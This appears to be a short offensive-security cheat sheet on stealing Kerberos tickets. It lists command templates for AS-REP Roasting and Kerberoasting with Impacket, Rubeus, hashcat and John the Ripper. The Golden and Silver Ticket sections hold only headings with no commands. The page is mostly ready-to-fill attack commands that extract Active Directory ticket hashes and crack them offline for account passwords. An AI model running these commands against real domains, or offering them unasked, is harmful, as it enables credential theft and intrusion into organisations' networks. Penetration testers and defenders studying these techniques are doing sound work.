Steal or Forge Kerberos Tickets
AS-REP Roasting
GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>.\Rubeus.exe asreproast /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_file>john --wordlist=<passwords_file> <AS_REP_responses_file>Kerberoasting
Impacket
GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>Rubeus
.\Rubeus.exe kerberoast /outfile:<output_TGSs_file>PowerShell
Golden Ticket
Impacket
Mimikatz
Rubeus
Misc
Silver Ticket
Impacket
Mimikatz
Rubeus
Last updated
Was this helpful?